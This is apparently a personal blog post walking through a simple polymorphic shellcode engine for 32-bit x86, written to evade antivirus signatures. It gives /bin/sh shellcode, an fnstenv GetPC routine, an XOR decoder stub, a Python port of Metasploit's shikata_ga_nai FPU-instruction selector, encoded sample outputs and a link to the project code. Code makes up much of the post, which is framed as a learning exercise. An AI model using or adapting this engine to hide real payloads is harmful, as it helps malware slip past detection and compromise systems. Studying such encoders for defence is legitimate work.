Writing a Simple Polymorphic Engine

Polymorphism

The word polymorphism comes from Greek and means “having many forms”. In this context, polymorphism refers to a common antivirus evasion technique in which shellcode or binaries are encrypted or obfuscated to avoid detection. A polymorphic engine generates different code on each run that does the same thing. In other words, the output is syntactically different but functionally identical. This makes signature-based detection difficult because the generated bytes differ every time.

Consider a piece of shellcode from Shell Storm that executes /bin/sh:

xor eax,eax
push eax
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80
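
As a small aside, the two dword pushes in the listing above build the path string on the stack. The sketch below only decodes those two constants to show what they spell in memory; the variable names are my own and nothing here comes from the engine itself.

```python
import struct

# The two dwords pushed by the shellcode, in push order.
pushed = [0x68732f2f, 0x6e69622f]

# x86 is little-endian and the stack grows downward, so the value pushed
# last sits at the lowest address. Reading memory upward from esp
# therefore walks the pushes in reverse order.
in_memory = b"".join(struct.pack("<I", dword) for dword in reversed(pushed))

print(in_memory)  # b'/bin//sh'
```

The doubled slash pads the path to eight bytes so that it fits exactly into two dwords.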

Most shellcode that executes /bin/sh is structured in a similar way, which makes signature-based detection easy, especially given the data being pushed: 0x68732f2f (hs//) and 0x6e69622f (nib/). Putting this through the polymorphic engine generates the following instructions:

fcmovu st7
fnstenv [esp-0x9]
mov edx,[esp+0x3]
mov cl,0x17
mov bl,0xc9
xor [edx+ecx+0x13],bl
loop 0xe
clc
or [ecx-0x4519195f],ebx
mov eax,[0xa0abe6a1]
cmpsd
inc eax
sub bl,[ecx+0x7928409a]
ret 0x4904

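Though the instructions look very different, they do the same thing: spawn a shell. Everything after the loop instruction is the XOR-encoded payload, which the disassembler renders as meaningless instructions until the stub decodes it at run time.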


The Engine

This polymorphic engine is very simple. It works on 32-bit x86 only. There is not even a way to specify bad characters yet, though I plan to put more work into it.

Polymorphic engines are an old topic. AVs now have heuristics, sandboxing and the like to detect polymorphic code. There are also much more advanced evasion techniques out there now. Nonetheless, this has been a very rewarding learning experience for me and I hope you will enjoy it too.

Overview

The engine reads the payload bytes and XORs each of them with a random one-byte key. A decoder stub is placed before the encoded payload; at run time it decodes the instructions and passes execution to them. The decoder stub carries the risk of being fingerprinted and having signatures generated against it. To mitigate this, the engine can vary registers and offsets, ciphers or encoding methods, the shape of the decoding routine, and so on.
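
The encoding step described above can be sketched in a few lines. This is a minimal illustration rather than the engine's actual code: xor_encode is a hypothetical helper name, and the sample bytes are a placeholder, not real shellcode.

```python
import random


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a one-byte key."""
    return bytes(b ^ key for b in data)


sample = b"stand-in payload bytes"  # hypothetical placeholder data
key = random.randint(1, 255)        # a key of 0 would leave the bytes unchanged

encoded = xor_encode(sample, key)
decoded = xor_encode(encoded, key)  # XOR is its own inverse

assert decoded == sample
assert encoded != sample
```

Because XOR is its own inverse, the same operation with the same key serves as both encoder and decoder, which is what keeps the run-time stub so small.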

GetPC/GetEIP Routine

The decoder stub needs to know where it is executing in memory so that it can calculate offsets, decode the payload and pass control to it. This address cannot be hardcoded into the stub because shellcode usually has no control over where it is loaded and executed. Hence the need to obtain the EIP (Extended Instruction Pointer), also called the PC (Program Counter), dynamically.

There are multiple ways to do this, but I’ve chosen the fnstenv method. The fnstenv instruction is part of the FPU instruction set. It writes the FPU environment, a data structure that includes the address of the last executed FPU instruction, to the memory location given as its operand.

The Intel manual describes the operation as follows (this pseudocode lists the fields, not their order in memory):

DEST[FPUControlWord] ← FPUControlWord;
DEST[FPUStatusWord] ← FPUStatusWord;
DEST[FPUTagWord] ← FPUTagWord;
DEST[FPUDataPointer] ← FPUDataPointer;
DEST[FPUInstructionPointer] ← FPUInstructionPointer;
DEST[FPULastInstructionOpcode] ← FPULastInstructionOpcode;

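FPUInstructionPointer, not FPUDataPointer, holds the address of the last executed FPU instruction. In the 32-bit protected-mode layout it sits at offset 0xc of the saved structure.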

It is possible to get the instruction pointer by doing something like this:

global _start

section .text

_start:
    ; FPU instruction
    fcmovnu st0
    
    ; save current FPU operating
    ; environment at a given
    ; location, which includes
    ; an address of the last 
    ; executed FPU instruction
    
    ; The structure is as follows:
    ; DEST[FPUControlWord] ← FPUControlWord;
    ; DEST[FPUStatusWord] ← FPUStatusWord;
    ; DEST[FPUTagWord] ← FPUTagWord;
    ; DEST[FPUDataPointer] ← FPUDataPointer;
    ; DEST[FPUInstructionPointer] ← FPUInstructionPointer;
    ; DEST[FPULastInstructionOpcode] ← FPULastInstructionOpcode;
    
    ; FPUInstructionPointer has the address we need.
    ; It sits at offset 0xc of the saved structure,
    ; so writing the structure at esp-0xc puts it
    ; right at the top of the stack ([esp])
    fnstenv [esp-0xc]
    ; edi now has the address
    ; of the last executed
    ; FPU instruction, which
    ; is used to relatively 
    ; address other stuff
    pop edi

The registers and the ESP offsets are chosen randomly to increase the uniqueness of the generated code. You can get really creative to make the decoder stub look different each time.
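
To make the offset arithmetic concrete, here is a small sketch of where the saved instruction pointer ends up relative to esp for a given fnstenv displacement. The field offsets follow the 32-bit protected-mode layout in the Intel manual; the dictionary keys and the fip_offset_from_esp helper are names I made up for illustration.

```python
# Offsets of the fields in the 28-byte environment that fnstenv stores
# in 32-bit protected mode.
FNSTENV_LAYOUT = {
    "FPUControlWord": 0x00,
    "FPUStatusWord": 0x04,
    "FPUTagWord": 0x08,
    "FPUInstructionPointer": 0x0C,
    "FPUInstructionPointerSelector_and_Opcode": 0x10,
    "FPUDataPointer": 0x14,
    "FPUDataPointerSelector": 0x18,
}


def fip_offset_from_esp(fnstenv_disp: int) -> int:
    """Offset from esp of the saved instruction pointer for fnstenv [esp+disp]."""
    return fnstenv_disp + FNSTENV_LAYOUT["FPUInstructionPointer"]


print(fip_offset_from_esp(-0xC))  # 0  -> a single pop retrieves it
print(fip_offset_from_esp(-0x9))  # 3  -> mov reg, [esp+0x3]
print(fip_offset_from_esp(0x0))   # 12 -> the fourth pop retrieves it
```

The three cases correspond to the variants that appear in this post: a single pop after fnstenv [esp-0xc], a mov from [esp+0x3] after fnstenv [esp-0x9], and four pops after fnstenv [esp].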

There are a number of two-byte FPU instructions with default operands that we can use. Metasploit’s shikata_ga_nai encoder uses the same method, and it generates the usable FPU instructions in an elegant way, which I’ve ported to Python:

import random


def get_random_fpu_instruction():
    """Returns a random FPU instruction.

    Ported to python from metasploit's shikata_ga_nai.rb
    """

    fpu_opcodes = list()

    # D9E8 - D9EE
    for opcode in range(0xe8, 0xee+1):
        fpu_opcodes.append(bytes([0xd9, opcode]))

    # D9C0 - D9CF
    for opcode in range(0xc0, 0xcf+1):
        fpu_opcodes.append(bytes([0xd9, opcode]))

    # DAC0 - DADF
    for opcode in range(0xc0, 0xdf+1):
        fpu_opcodes.append(bytes([0xda, opcode]))

    # DBC0 - DBDF
    for opcode in range(0xc0, 0xdf+1):
        fpu_opcodes.append(bytes([0xdb, opcode]))

    # DDC0 - DDC7
    for opcode in range(0xc0, 0xc7+1):
        fpu_opcodes.append(bytes([0xdd, opcode]))

    fpu_opcodes.append(bytes([0xd9, 0xd0]))
    fpu_opcodes.append(bytes([0xd9, 0xe1]))
    fpu_opcodes.append(bytes([0xd9, 0xf6]))
    fpu_opcodes.append(bytes([0xd9, 0xf7]))
    fpu_opcodes.append(bytes([0xd9, 0xe5]))

    return random.choice(fpu_opcodes)

Stub

Once the EIP, or some address relative to it, is known, we can calculate other addresses relative to it, such as the start and end of the encoded payload. With all the needed information in different registers, decoding is done as follows:

; payload length
mov cl, 0x26
; xor key
mov bl, 0xab

; decode subroutine
decode:
    ; eax has the PC
    ; ecx (set through cl) is the payload
    ; length, which loop decrements on
    ; each iteration; this assumes the
    ; upper 24 bits of ecx are zero
    xor [eax + ecx + 0x11], bl
    loop decode
payload:
    ; encoded payload here

Once decoding is done, execution falls through to the decoded payload, which sits immediately after the decode subroutine.
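
The relationship between the stub length and the displacement in the xor instruction can be checked with a short simulation. This is a sketch under my own assumptions: simulate_decode is a hypothetical helper, the stub is represented by dummy zero bytes, and the payload is placeholder text rather than shellcode.

```python
def simulate_decode(memory: bytearray, base: int, length: int,
                    disp: int, key: int) -> None:
    """Mimic `xor [base + ecx + disp], bl` followed by `loop`, in place."""
    ecx = length
    while ecx != 0:
        memory[base + ecx + disp] ^= key
        ecx -= 1  # `loop` decrements ecx and repeats until it reaches 0


stub_len = 20                  # hypothetical stub size in bytes
payload = b"stand-in payload"  # hypothetical placeholder data
key = 0xAB
encoded = bytes(b ^ key for b in payload)

# Dummy stub bytes followed by the encoded payload.
memory = bytearray(b"\x00" * stub_len + encoded)
base = 0             # address of the FPU instruction, i.e. the stub start
disp = stub_len - 1  # ecx bottoms out at 1, not 0, hence the -1

simulate_decode(memory, base, len(payload), disp, key)

assert bytes(memory[stub_len:]) == payload         # payload fully decoded
assert bytes(memory[:stub_len]) == b"\x00" * stub_len  # stub left untouched
```

Since ecx counts down from the payload length to 1, the loop decodes from the last byte to the first, and the displacement has to be one less than the distance from the FPU instruction to the first payload byte. By my count the stub in the first generated sample is 20 bytes long, which would be consistent with the 0x13 displacement it uses.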


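Metasploit’s linux/x86/exec payload, configured to execute id (the bytes after the call hold the string "id" followed by the final instructions, which is why the disassembler shows a bogus imul there):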

push byte +0xb
pop eax
cdq
push edx
push word 0x632d
mov edi,esp
push dword 0x68732f
push dword 0x6e69622f
mov ebx,esp
push edx
call 0x20
imul esp,[eax+eax+0x57],dword 0xcde18953
db 0x80

Putting it through the engine:

fxch st2
fnstenv [esp]
pop eax
pop esi
pop eax
pop esi
mov cl,0x26
mov bl,0xf9
xor [esi+ecx+0x13],bl
loop 0xd
xchg eax,ebx
repne mov eax,[0x919fab60]
aam 0x9a
jo 0x3c
xchg eax,ecx
salc
mov dl,[ecx-0x64296e07]
nop
xchg eax,edi
jo 0x44
stosd
adc edx,edi
stc
stc
stc
nop
popf
stc
scasb
stosb
jo 0x4f
xor al,0x79

Disclaimer: Everything on this site is for educational purposes only. If you’re looking to hack into unauthorized systems or do something illegal, please look elsewhere.

The project is available on GitHub with an MIT license: https://github.com/0x5FC3/spe.py

Constructive criticism, feedback, suggestions and PRs welcome!

- 0x5FC3